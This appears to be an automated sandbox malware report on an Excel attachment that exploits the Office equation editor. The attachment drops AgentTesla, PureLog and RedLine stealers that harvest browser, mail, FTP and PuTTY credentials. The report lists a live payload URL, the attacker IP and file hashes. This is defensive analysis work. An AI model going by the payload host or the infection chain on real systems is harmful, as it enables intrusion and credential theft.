                  Source: OIU.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2220, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2220, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.OIU.exe.de0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.OIU.exe.120000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.OIU.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.OIU.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.OIU.exe.360000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,3_2_00C21204
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_00C21806

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		2
                  Valid Accounts                  		121
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		14
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		121
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  Exploitation for Client Execution                  		2
                  Valid Accounts                  		2
                  Valid Accounts                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  Software Packing                  		NTDS38
                  System Information Discovery                  		Distributed Component Object Model121
                  Input Capture                  		14
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets34
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials22
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Valid Accounts                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1435095 Sample: Order Request1_5_24.xlam.xlsx Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 17 other signatures 2->68 12 EXCEL.EXE 6 11 2->12         started        14 chrome.exe 1 2->14         started        17 chrome.exe 2->17         started        process3 dnsIp4 19 EQNEDT32.EXE 1 12->19         started        60 239.255.255.250 unknown Reserved 14->60 24 chrome.exe 14->24         started        26 chrome.exe 17->26         started        process5 dnsIp6 56 23.94.54.101, 49163, 80 AS-COLOCROSSINGUS United States 19->56 54 C:\Users\user\AppData\Roaming\OIU.exe, PE32 19->54 dropped 80 Office equation editor establishes network connection 19->80 82 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 19->82 28 OIU.exe 4 19->28         started        58 www.google.com 172.217.1.4, 443, 49164, 49168 GOOGLEUS United States 24->58 file7 signatures8 process9 signatures10 86 Multi AV Scanner detection for dropped file 28->86 88 Binary is likely a compiled AutoIt script file 28->88 90 Machine Learning detection for dropped file 28->90 92 Found API chain indicative of sandbox detection 28->92 31 OIU.exe 2 28->31         started        34 RegSvcs.exe 28->34         started        process11 signatures12 100 Binary is likely a compiled AutoIt script file 31->100 36 OIU.exe 2 31->36         started        39 RegSvcs.exe 31->39         started        102 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 34->102 process13 signatures14 78 Binary is likely a compiled AutoIt script file 36->78 41 OIU.exe 2 36->41         started        44 RegSvcs.exe 36->44         started        process15 signatures16 84 Binary is likely a compiled AutoIt script file 41->84 46 OIU.exe 2 41->46         started        49 RegSvcs.exe 41->49         started        process17 signatures18 94 Binary is likely a compiled AutoIt script file 46->94 96 Writes to foreign memory regions 46->96 98 Maps a DLL or memory area into another process 46->98 51 RegSvcs.exe 12 2 46->51         started        process19 signatures20 70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 51->70 72 Tries to steal Mail credentials (via file / registry access) 51->72 74 Tries to harvest and steal ftp login credentials 51->74 76 Tries to harvest and steal browser information (history, passwords, etc) 51->76

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Order Request1_5_24.xlam.xlsx52%VirustotalBrowse
                  Order Request1_5_24.xlam.xlsx68%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  Order Request1_5_24.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\OIU.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\OIU.exe27%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://23.94.54.101/IZG.exe0%Avira URL Cloudsafe
                  https://api.ipify.0%Avira URL Cloudsafe
                  http://23.94.54.101/IZG.exe5%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  www.google.com
                  		172.217.1.4
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://www.google.com/async/ddljson?async=ntp:2false
                      		high
                      http://23.94.54.101/IZG.exetrue
                      • 5%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKiDzLEGIjBAUeVDNkDlIZK5bJjKqxg5bm1WdYDjlLN5FTPlXAMxmGzLgqn1-pjmnO28YPm4sx4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                        		high
                        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                          		high
                          https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKeDzLEGIjBSLRpDP2VScdj7Wpd5SrmnrYLtq8Jxv8Ovu6XTpT1_vcDso1uPHungiEeAb9P6jnYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                            		high
                            https://www.google.com/async/newtab_promosfalse
                              		high
                              https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                		high
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKeDzLEGIjDeDtf43edoX_DQr4xePeWIRj_Zk_cdJHjRaIqGGnjHhWEURD3S2dwEoI7xgpMRkzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                  		high
                                  https://www.google.com/chrome/whats-new/m109?internal=truefalse
                                    		high
                                    https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKeDzLEGIjAngwEuuQDIFwKdm-Bs70gGjylYp6jr6gUkagUnxegoQxARWccq1LwEgBECfcL1PAAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                      		high
                                      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKiDzLEGIjDtjnMJodbdiXF-HQ_fQDkAxnKugxL_IiaU5Bdf1yGe-xSVBDfYF_nK-idk43_IHf0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://api.ipify.org/RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.ipify.orgRegSvcs.exe, 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.000000000281C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://account.dyn.com/RegSvcs.exe, 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.ipify.RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                239.255.255.250
                                                		unknownReserved
                                                		unknownunknownfalse
                                                23.94.54.101
                                                		unknownUnited States
                                                		36352AS-COLOCROSSINGUStrue
                                                172.217.1.4
                                                		www.google.comUnited States
                                                		15169GOOGLEUSfalse

                                                General Information

                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1435095
                                                Start date and time:2024-05-02 04:57:28 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 2s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:20
                                                Number of new started drivers analysed:3
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Order Request1_5_24.xlam.xlsx
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winXLSX@42/18@4/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 81
                                                • Number of non-executed functions: 278
                                                Cookbook Comments:
                                                • Found application associated with file extension: .xlsx
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Active ActiveX Object
                                                • Scroll down
                                                • Close Viewer

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, vga.dll
                                                • Excluded IPs from analysis (whitelisted): 142.251.33.163, 172.253.63.84, 142.251.32.78, 34.104.35.123
                                                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                04:59:06API Interceptor26x Sleep call for process: EQNEDT32.EXE modified
                                                04:59:13API Interceptor9x Sleep call for process: RegSvcs.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                239.255.255.250202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                  7sYKxZWLgw.exeGet hashmaliciousPureLog StealerBrowse
                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                      Account report (1).docxGet hashmaliciousUnknownBrowse
                                                        Account report (1).docxGet hashmaliciousUnknownBrowse
                                                          Account report (1).docxGet hashmaliciousUnknownBrowse
                                                            SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                              https://ipgnz-my.sharepoint.com/:b:/p/dennis/EQBdT3T6DAtNud_AgeVvevoBe4Wv-zzpt7vOYoJkOhRHCQ?e=4%3ao8ZtZs&at=9&xsdata=MDV8MDJ8bGlhbmRhLnN0b2VsQG1sY2luc3VyYW5jZS5jb20uYXV8ZWQ1OTE1MzNhZDY4NDYyZGVhMzEwOGRjNjk4OGRiNjR8YTRlYmRjZDY2ODU0NGRlMGIxOGM3MmQ2ZjA5ZDA1MzV8MHwwfDYzODUwMTI4NDE4MTIzMzI1MXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18ODAwMDB8fHw%3d&sdata=Zjh2Q283ajAyWEprbjBOUFdSdEFmRDhIdUU4Ym01c0JKNzV6cU1BWklhST0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                Signature requested-Fiona QR.pngGet hashmaliciousHTMLPhisherBrowse
                                                                  Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                                    23.94.54.101202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                    • 23.94.54.101/GVV.exe
                                                                    attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                    • 23.94.54.101/EPQ.exe
                                                                    NI-45733-D.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                    • 23.94.54.101/ESS.exe

                                                                    Domains

                                                                    No context

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    AS-COLOCROSSINGUS202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                    • 23.94.53.100
                                                                    OWrVfOdM62.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 192.3.239.4
                                                                    ET2431000075 & ET2431000076.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 192.3.239.4
                                                                    nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                    • 107.172.31.6
                                                                    SecuriteInfo.com.Linux.Siggen.9999.4824.4127.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    • 23.94.151.97
                                                                    QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                                                    • 192.3.243.154
                                                                    attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                    • 23.94.54.101
                                                                    citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 192.3.243.154
                                                                    cotizaci#U00f3n_04302024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                    • 192.3.243.154
                                                                    SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtfGet hashmaliciousAgentTeslaBrowse
                                                                    • 192.3.243.154

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Temp\Esher

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):268800
                                                                    Entropy (8bit):7.905027527993877
                                                                    Encrypted:false
                                                                    SSDEEP:6144:0GQG5ytMEwsoj9AKpFNUQ02J2O3O3ik+Bvvn+wH4Boc:0GQG5yssCFNUQbJ2YO3WlP+O8oc
                                                                    MD5:183BA29E3BA1A448C983A6772EA728E8
                                                                    SHA1:43E8E4E6C8925D72F3B24EF74BD7017F6D7503C1
                                                                    SHA-256:2C74D0B73DA91109988EA8AE9AE5BE693FD1F565751DFD28E4D4F5F4BDEA91B5
                                                                    SHA-512:F2BF3E7DCCEF67AE24D9401B10D726C0085616235B38CDEFD9C8BF1C952F7ACEB61E0AEEA711FF7A797921F5BDE8F75BB02CEC26FDC5271840FD8723602B1C0D
                                                                    Malicious:false
                                                                    Preview:yc.152P2COOE.TN.9C08CIA.B6L5I49T162P2GOOE5STNI9C08CIABB6L5I.9T18-.<G.F...U....XQ0i10-Q>T$.Z5_X]$.%*o7@=t''...kc$.&'.A8C.9T162P2/_.h.".0eH.N.2.?paI2.8.G_..L{C.1c4.-.?.Gq.V=U0.<.o\7.H.O..+Lj>.;g:7&eH.N8CIABB6L5I49T162..U)OE5S..I9.1<C=.B.6L5I49T1.2s3LNFE5.UNIGA08CIAm.6L5Y49T.72P2.OOU5STLI9F08CIABB3L5I49T16RT2GKOE.hVNK9C.8CYABR6L5I$9T!62P2GO_E5STNI9C08C.T@BfL5I4YV1:.Q2GOOE5STNI9C08CIABB6L5I49..72L2GOOE5STNI9C08CIABB6L5I49T1.?R2.OOE5STNI9C08.HA.C6L5I49T162P2GOOE5STNI9C08Cg5':BL5I,.U16"P2G.NE5WTNI9C08CIABB6L.I4YzCRS$SGO.(5ST.H9C^8CI.CB6L5I49T162P2.OO..75:(9C0.sIABb4L5_49T;42P2GOOE5STNI9.08.g310UL5I8.U16RR2G.NE5sVNI9C08CIABB6LuI4yT162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GOOE5STNI9C08CIABB6L5I49T162P2GO

                                                                    C:\Users\user\AppData\Local\Temp\autCC64.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):268800
                                                                    Entropy (8bit):7.905027527993877
                                                                    Encrypted:false
                                                                    SSDEEP:6144:0GQG5ytMEwsoj9AKpFNUQ02J2O3O3ik+Bvvn+wH4Boc:0GQG5yssCFNUQbJ2YO3WlP+O8oc
                                                                    MD5:183BA29E3BA1A448C983A6772EA728E8
                                                                    SHA1:43E8E4E6C8925D72F3B24EF74BD7017F6D7503C1
                                                                    SHA-256:2C74D0B73DA91109988EA8AE9AE5BE693FD1F565751DFD28E4D4F5F4BDEA91B5
                                                                    SHA-512:F2BF3E7DCCEF67AE24D9401B10D726C0085616235B38CDEFD9C8BF1C952F7ACEB61E0AEEA711FF7A797921F5BDE8F75BB02CEC26FDC5271840FD8723602B1C0D
                                                                    Malicious:false
